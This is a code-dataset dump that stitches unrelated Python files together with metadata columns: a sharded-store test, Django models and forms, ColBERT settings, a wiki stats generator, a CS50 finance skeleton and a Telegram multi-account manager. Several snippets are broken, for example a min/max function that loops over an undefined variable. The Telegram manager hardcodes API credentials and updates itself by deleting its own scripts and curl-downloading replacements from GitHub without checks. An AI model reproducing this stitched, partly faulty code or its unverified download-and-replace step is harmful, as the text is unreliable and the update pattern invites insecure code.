def checkFor(key, value, sharded, shard=None):
correct_shard = sharded._stores[hash(key) % len(sharded._stores)]
for s in sharded._stores:
if shard and s == shard:
self.assertTrue(s.contains(key))
self.assertEqual(s.get(key), value)
else:
self.assertFalse(s.contains(key))
if correct_shard == shard:
self.assertTrue(sharded.contains(key))
self.assertEqual(sharded.get(key), value)
else:
self.assertFalse(sharded.contains(key))
self.assertEqual(sumlens(stores), 0)
# test all correct.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for i in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
sharded.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
if value % 2 == 0:
shard.delete(key)
else:
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
# try out adding it to the wrong shards.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this wont do anything
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.delete(key)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.put(key, value)
incorrect_shard.delete(key)
checkFor(key, value, sharded, correct_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, correct_shard)
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
self.subtest_simple([sharded])
if __name__ == '__main__':
unittest.main() | en | 0.869534 | # ensure removing non-existent keys is ok. # insert numelems elems # reassure they're all there. # make sure everything is there. #TODO: should order be preserved? # self.assertEqual(result, expected) # change numelems elems # remove numelems elems # make sure the cache is used # make sure the cache is not relief upon # make sure the cache works in tandem # helper to check queries # ensure _link_value_for_key and _link_for_value work # adding a value should work like usual # _follow_link(sds._link_value_for_key(a)) should == get(a) # linking keys should work # changing link should affect source # deleting source should affect link # putting back source should yield working link # deleting link should not affect source # linking should bring back to normal # Adding another link should not affect things. # linking should be transitive # test all correct. # ensure its in the same spots. # ensure its in the same spots. # ensure its in the same spots. # try out adding it to the wrong shards. # ensure its in the same spots. # this wont do anything # this will place it correctly. # this will place it correctly. | 3.06548 | 3 |
rooms/models.py | Neisvestney/SentSyncServer | 0 | 9149 | from django.db import models
class Room(models.Model):
code = models.CharField('Code', max_length=128)
tab_url = models.CharField('Tab url', max_length=512, default='', blank=True)
def to_dict(self):
return {
'users': [u.to_dict() for u in self.users.all()],
'tabUrl': self.tab_url
}
def __str__(self):
return f'Room {self.code}'
class RoomUser(models.Model):
room = models.ForeignKey(Room, related_name='users', on_delete=models.CASCADE)
username = models.CharField('Username', max_length=128, default="user")
host = models.BooleanField('Is host')
def to_dict(self):
return {
'id': self.id,
'username': self.username,
'isHost': self.host,
}
def __str__(self):
return f'{self.username} ({self.id})'
| from django.db import models
class Room(models.Model):
code = models.CharField('Code', max_length=128)
tab_url = models.CharField('Tab url', max_length=512, default='', blank=True)
def to_dict(self):
return {
'users': [u.to_dict() for u in self.users.all()],
'tabUrl': self.tab_url
}
def __str__(self):
return f'Room {self.code}'
class RoomUser(models.Model):
room = models.ForeignKey(Room, related_name='users', on_delete=models.CASCADE)
username = models.CharField('Username', max_length=128, default="user")
host = models.BooleanField('Is host')
def to_dict(self):
return {
'id': self.id,
'username': self.username,
'isHost': self.host,
}
def __str__(self):
return f'{self.username} ({self.id})'
| none | 1 | 2.318539 | 2 |
|
colbert/parameters.py | techthiyanes/ColBERT | 421 | 9150 | import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
| import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
| none | 1 | 2.070674 | 2 |
|
jarvis/stats.py | aburgd/sheila | 0 | 9151 | <reponame>aburgd/sheila
#!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import pyscp
import textwrap
from dominate import tags as dt
from . import core, lex, ext
###############################################################################
# Templates
###############################################################################
CHART = """
google.charts.setOnLoadCallback({name});
function {name}() {{
var data = new google.visualization.arrayToDataTable([
{data}
]);
var options = {options};
var chart = new google.visualization.{class_name}(
document.getElementById('{name}'));
chart.draw(data, options);
}}
"""
USER = """
[[html]]
<base target="_parent" />
<style type="text/css">
@import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css);
</style>
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js">
</script>
<script type="text/javascript">
google.charts.load('current', {{'packages':['table', 'corechart']}});
{summary_table}
{articles_chart}
{articles_table}
</script>
<div id="summary_table"></div>
<div id="articles_chart"></div>
<div style="clear: both;"></div>
<h4>Articles</h4>
<div id="articles_table"></div>
[[/html]]
"""
###############################################################################
# Helper Functions
###############################################################################
def html(tag, text, **kwargs):
if 'cls' in kwargs:
kwargs['class'] = kwargs.pop('cls')
attrs = ' '.join('{}="{}"'.format(k, v) for k, v in kwargs.items())
if attrs:
attrs = ' ' + attrs
return '<{tag}{attrs}>{text}</{tag}>'.format(
tag=tag, text=text, attrs=attrs)
###############################################################################
# Chart Classes
###############################################################################
class Chart:
def format_row(self, row, indent):
row = ',\n'.join(map(repr, row))
row = textwrap.indent(row, ' ')
row = '[\n{}\n]'.format(row)
return textwrap.indent(row, ' ' * indent)
def render(self):
data = ',\n'.join([self.format_row(r, 8) for r in self.data])
return CHART.format(
name=self.name,
class_name=self.class_name,
data=data,
options=self.options)
class SummaryTable(Chart):
def __init__(self, pages, name):
self.name = 'summary_table'
self.class_name = 'Table'
self.populate(pages, name)
self.options = {
'sort': 'disable',
'width': '100%'}
def populate(self, pages, name):
self.data = [
['Category', 'Page Count', 'Net Rating', 'Average'],
['Total', pages.count, pages.rating, pages.average]]
for k, v in pages.split_page_type().items():
self.data.append([k, v.count, v.rating, v.average])
for k, v in pages.split_relation(name).items():
self.data.append([k, v.count, v.rating, v.average])
class ArticlesChart(Chart):
def __init__(self, pages, user):
self.name = 'articles_chart'
self.class_name = 'ColumnChart'
self.user = user
self.populate(pages)
self.options = {
'backgroundColor': '#e7e9dc',
'chartArea': {
'left': 0,
'top': 0,
'width': '100%',
'height': '100%'},
'hAxis': {'textPosition': 'none'},
'vAxis': {
'textPosition': 'none',
'gridlines': {'color': '#e7e9dc'},
'minValue': 0},
'legend': {'position': 'none'},
'height': 350,
'tooltip': {'isHtml': 1}}
def populate(self, pages):
self.data = [[
'Title',
'Rating',
{'role': 'tooltip', 'p': {'html': 'true'}},
{'role': 'style'}]]
for p in pages:
if 'scp' in p.tags:
color = 'color: #db4437'
elif 'tale' in p.tags:
color = 'color: #4285f4'
else:
color = 'color: #f4b400'
date = p.metadata[self.user].date[:10] or '-'
tooltip = dt.table(
dt.tr(dt.td(p.title, colspan=2)),
dt.tr(dt.td('Rating:'), dt.td(p.rating)),
dt.tr(dt.td('Created:'), dt.td(date)),
cls='articles_chart_tooltip')
self.data.append([
p.title,
p.rating,
tooltip.render(pretty=False),
color])
class ArticlesTable(Chart):
def __init__(self, pages, user):
self.name = 'articles_table'
self.class_name = 'Table'
self.populate(pages, user)
self.options = {
'showRowNumber': 1,
'allowHtml': 1,
'sortColumn': 1,
'sortAscending': 0,
'width': '100%'}
def populate(self, pages, user):
self.data = ['Title Rating Tags Link Created Role'.split()]
for p in pages:
tags = [html('b', t) if t in 'scp tale hub admin author' else t
for t in p.tags]
tags = ', '.join(sorted(tags))
link = html('a', p.url.split('/')[-1], href=p.url)
role = p.metadata[user].role
role = html('span', role, cls='rel-' + role)
date = p.metadata[user].date[:10]
self.data.append([p.title, p.rating, tags, link, date, role])
###############################################################################
def update_user(name):
wiki = pyscp.wikidot.Wiki('scp-stats')
wiki.auth(core.config.wiki.name, core.config.wiki.password)
p = wiki('user:' + name.lower())
pages = sorted(
core.pages.related(name),
key=lambda x: (x.metadata[name].date, x.created))
pages = ext.PageView(pages)
if not pages.articles:
return lex.not_found.author
data = USER.format(
summary_table=SummaryTable(pages.primary(name), name).render(),
articles_chart=ArticlesChart(pages.articles, name).render(),
articles_table=ArticlesTable(
[p for p in pages if p.tags], name).render())
p.create(data, title=name, comment='automated update')
return p.url
| #!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import pyscp
import textwrap
from dominate import tags as dt
from . import core, lex, ext
###############################################################################
# Templates
###############################################################################
CHART = """
google.charts.setOnLoadCallback({name});
function {name}() {{
var data = new google.visualization.arrayToDataTable([
{data}
]);
var options = {options};
var chart = new google.visualization.{class_name}(
document.getElementById('{name}'));
chart.draw(data, options);
}}
"""
USER = """
[[html]]
<base target="_parent" />
<style type="text/css">
@import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css);
</style>
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js">
</script>
<script type="text/javascript">
google.charts.load('current', {{'packages':['table', 'corechart']}});
{summary_table}
{articles_chart}
{articles_table}
</script>
<div id="summary_table"></div>
<div id="articles_chart"></div>
<div style="clear: both;"></div>
<h4>Articles</h4>
<div id="articles_table"></div>
[[/html]]
"""
###############################################################################
# Helper Functions
###############################################################################
def html(tag, text, **kwargs):
if 'cls' in kwargs:
kwargs['class'] = kwargs.pop('cls')
attrs = ' '.join('{}="{}"'.format(k, v) for k, v in kwargs.items())
if attrs:
attrs = ' ' + attrs
return '<{tag}{attrs}>{text}</{tag}>'.format(
tag=tag, text=text, attrs=attrs)
###############################################################################
# Chart Classes
###############################################################################
class Chart:
def format_row(self, row, indent):
row = ',\n'.join(map(repr, row))
row = textwrap.indent(row, ' ')
row = '[\n{}\n]'.format(row)
return textwrap.indent(row, ' ' * indent)
def render(self):
data = ',\n'.join([self.format_row(r, 8) for r in self.data])
return CHART.format(
name=self.name,
class_name=self.class_name,
data=data,
options=self.options)
class SummaryTable(Chart):
def __init__(self, pages, name):
self.name = 'summary_table'
self.class_name = 'Table'
self.populate(pages, name)
self.options = {
'sort': 'disable',
'width': '100%'}
def populate(self, pages, name):
self.data = [
['Category', 'Page Count', 'Net Rating', 'Average'],
['Total', pages.count, pages.rating, pages.average]]
for k, v in pages.split_page_type().items():
self.data.append([k, v.count, v.rating, v.average])
for k, v in pages.split_relation(name).items():
self.data.append([k, v.count, v.rating, v.average])
class ArticlesChart(Chart):
def __init__(self, pages, user):
self.name = 'articles_chart'
self.class_name = 'ColumnChart'
self.user = user
self.populate(pages)
self.options = {
'backgroundColor': '#e7e9dc',
'chartArea': {
'left': 0,
'top': 0,
'width': '100%',
'height': '100%'},
'hAxis': {'textPosition': 'none'},
'vAxis': {
'textPosition': 'none',
'gridlines': {'color': '#e7e9dc'},
'minValue': 0},
'legend': {'position': 'none'},
'height': 350,
'tooltip': {'isHtml': 1}}
def populate(self, pages):
self.data = [[
'Title',
'Rating',
{'role': 'tooltip', 'p': {'html': 'true'}},
{'role': 'style'}]]
for p in pages:
if 'scp' in p.tags:
color = 'color: #db4437'
elif 'tale' in p.tags:
color = 'color: #4285f4'
else:
color = 'color: #f4b400'
date = p.metadata[self.user].date[:10] or '-'
tooltip = dt.table(
dt.tr(dt.td(p.title, colspan=2)),
dt.tr(dt.td('Rating:'), dt.td(p.rating)),
dt.tr(dt.td('Created:'), dt.td(date)),
cls='articles_chart_tooltip')
self.data.append([
p.title,
p.rating,
tooltip.render(pretty=False),
color])
class ArticlesTable(Chart):
def __init__(self, pages, user):
self.name = 'articles_table'
self.class_name = 'Table'
self.populate(pages, user)
self.options = {
'showRowNumber': 1,
'allowHtml': 1,
'sortColumn': 1,
'sortAscending': 0,
'width': '100%'}
def populate(self, pages, user):
self.data = ['Title Rating Tags Link Created Role'.split()]
for p in pages:
tags = [html('b', t) if t in 'scp tale hub admin author' else t
for t in p.tags]
tags = ', '.join(sorted(tags))
link = html('a', p.url.split('/')[-1], href=p.url)
role = p.metadata[user].role
role = html('span', role, cls='rel-' + role)
date = p.metadata[user].date[:10]
self.data.append([p.title, p.rating, tags, link, date, role])
###############################################################################
def update_user(name):
wiki = pyscp.wikidot.Wiki('scp-stats')
wiki.auth(core.config.wiki.name, core.config.wiki.password)
p = wiki('user:' + name.lower())
pages = sorted(
core.pages.related(name),
key=lambda x: (x.metadata[name].date, x.created))
pages = ext.PageView(pages)
if not pages.articles:
return lex.not_found.author
data = USER.format(
summary_table=SummaryTable(pages.primary(name), name).render(),
articles_chart=ArticlesChart(pages.articles, name).render(),
articles_table=ArticlesTable(
[p for p in pages if p.tags], name).render())
p.create(data, title=name, comment='automated update')
return p.url | de | 0.423372 | #!/usr/bin/env python3 ############################################################################### # Module Imports ############################################################################### ############################################################################### # Templates ############################################################################### google.charts.setOnLoadCallback({name}); function {name}() {{ var data = new google.visualization.arrayToDataTable([ {data} ]); var options = {options}; var chart = new google.visualization.{class_name}( document.getElementById('{name}')); chart.draw(data, options); }} [[html]] <base target="_parent" /> <style type="text/css"> @import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css); </style> <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"> </script> <script type="text/javascript"> google.charts.load('current', {{'packages':['table', 'corechart']}}); {summary_table} {articles_chart} {articles_table} </script> <div id="summary_table"></div> <div id="articles_chart"></div> <div style="clear: both;"></div> <h4>Articles</h4> <div id="articles_table"></div> [[/html]] ############################################################################### # Helper Functions ############################################################################### ############################################################################### # Chart Classes ############################################################################### #db4437' #4285f4' #f4b400' ############################################################################### | 2.190594 | 2 |
entry.py | Allenyou1126/allenyou-acme.sh | 0 | 9152 | <filename>entry.py
#!/usr/bin/env python3
import json
from allenyoucert import Cert
def main():
certList = list()
a = json()
main()
| <filename>entry.py
#!/usr/bin/env python3
import json
from allenyoucert import Cert
def main():
certList = list()
a = json()
main()
| fr | 0.221828 | #!/usr/bin/env python3 | 1.853258 | 2 |
dynts/lib/fallback/simplefunc.py | quantmind/dynts | 57 | 9153 |
from .common import *
def tsminmax(v):
mv = NaN
xv = NaN
for v in x:
if x == x:
if mv == mv:
mv = min(mv,x)
else:
mv = x
if xv == xv:
xv = max(xv,x)
else:
xv = x
return (mv,xv) |
from .common import *
def tsminmax(v):
mv = NaN
xv = NaN
for v in x:
if x == x:
if mv == mv:
mv = min(mv,x)
else:
mv = x
if xv == xv:
xv = max(xv,x)
else:
xv = x
return (mv,xv) | none | 1 | 2.940469 | 3 |
|
week9/finance/application.py | lcsm29/edx-harvard-cs50 | 0 | 9154 | import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
return apology("TODO")
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
return apology("TODO")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
return apology("TODO")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
return apology("TODO")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
return apology("TODO")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
| import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
return apology("TODO")
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
return apology("TODO")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
return apology("TODO")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
return apology("TODO")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
return apology("TODO")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
| en | 0.909698 | # Configure application # Ensure templates are auto-reloaded # Ensure responses aren't cached # Custom filter # Configure session to use filesystem (instead of signed cookies) # Configure CS50 Library to use SQLite database # Make sure API key is set Show portfolio of stocks Buy shares of stock Show history of transactions Log user in # Forget any user_id # User reached route via POST (as by submitting a form via POST) # Ensure username was submitted # Ensure password was submitted # Query database for username # Ensure username exists and password is correct # Remember which user has logged in # Redirect user to home page # User reached route via GET (as by clicking a link or via redirect) Log user out # Forget any user_id # Redirect user to login form Get stock quote. Register user Sell shares of stock Handle error # Listen for errors | 2.288179 | 2 |
users/forms.py | iurykrieger96/alura-django | 0 | 9155 | <filename>users/forms.py
from django import forms
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
class UserForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
password = forms.CharField(required=True)
phone = forms.CharField(required=True)
name_company = forms.CharField(required=True)
def is_valid(self):
valid = True
if not super(UserForm, self).is_valid():
self.add_erro('Por favor, verifique os dados informados')
valid = False
user_exists = User.objects.filter(username=self.data['name']).exists()
if user_exists:
self.add_erro('Usuario ja existente')
valid = False
return valid
def add_erro(self, message):
self._errors.setdefault(forms.forms.NON_FIELD_ERRORS, ErrorList()).append(message)
| <filename>users/forms.py
from django import forms
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
class UserForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
password = forms.CharField(required=True)
phone = forms.CharField(required=True)
name_company = forms.CharField(required=True)
def is_valid(self):
valid = True
if not super(UserForm, self).is_valid():
self.add_erro('Por favor, verifique os dados informados')
valid = False
user_exists = User.objects.filter(username=self.data['name']).exists()
if user_exists:
self.add_erro('Usuario ja existente')
valid = False
return valid
def add_erro(self, message):
self._errors.setdefault(forms.forms.NON_FIELD_ERRORS, ErrorList()).append(message)
| none | 1 | 2.46998 | 2 |
|
python/manager.py | Kiku-Reise/vsmart | 0 | 9156 | from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
